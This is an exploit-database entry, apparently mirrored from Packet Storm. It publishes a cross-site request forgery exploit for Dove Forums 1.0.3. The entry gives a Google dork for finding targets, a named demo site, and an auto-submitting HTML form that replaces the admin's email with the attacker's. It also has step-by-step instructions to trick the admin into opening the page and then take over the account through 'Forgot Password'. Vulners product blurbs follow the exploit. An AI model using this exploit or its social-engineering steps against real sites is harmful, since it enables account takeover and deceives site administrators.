Lucene search
K

Dove Forums 1.0.3 Cross Site Request Forgery

🗓️ 26 Jun 2012 00:00:00Reported by Ashiyane Digital Security TeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 45 Views

Dove Forums 1.0.3 Cross Site Request Forgery exploit to add admin by manipulating "Forgot Password" featur

Code
` In The Name Of Allah  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
# Exploit Title:Dove Forums-Add admin CSRF # @@@@@ |  
# Date : 2012-06-26 # @ @ +  
# Author :Ashiyane Digitl Security Team # @ @@@ @ |  
# Vendor :http://www.doveforums.com/ # @ @ @ @ +  
# Version: 1.0.3 # @ @@ @ |   
# e-mail: Gigelaknak [at] Yahoo [dot] com # W @ @ W +  
# Visit us: ashiyane.org/forums # s s |  
# Category: Webapps # s s +  
# Google dork:"Powered By Dove Forums Version: 1.0.3"# s s |  
# Demo site: http://allcrew.eu/forum/ # SS +  
# Tested on: # s s |  
# s s +  
# W W |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
  
1.Replace the forum path of your target with http://localhost/ at the second line of exploit code  
2.Replace your e-mail with [email protected] at the third line of exploit code  
3.Save the exploit code as .html file and upload it some where ,Then give the link to admin using social engineering !  
4.After admin opened the link ,click on the "Forgot Password" and get the Admin password on your E-mail ;)  
5. Good Luck B-)  
  
Tnx 2 N.A And all Iranian Hackers ...  
  
  
  
Exploit Code :  
  
<html>  
<form name="csrf" action="http://localhost/index.php/admin/users/update/1" class="form" method="post" accept-charset="utf-8">  
<input type="hidden" name="Username" value="admin" id="Username" class="textbox" />  
<input type="hidden" name="Email" value="[email protected]" id="Email" class="textbox" />  
<select name="group">  
<option value="1" selected="selected">admin</option>  
</select>  
<input type="checkbox" name="Active" value="1" checked="checked" id="Active" class="checkbox" />  
</from>  
<script>document.csrf.submit();</script>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation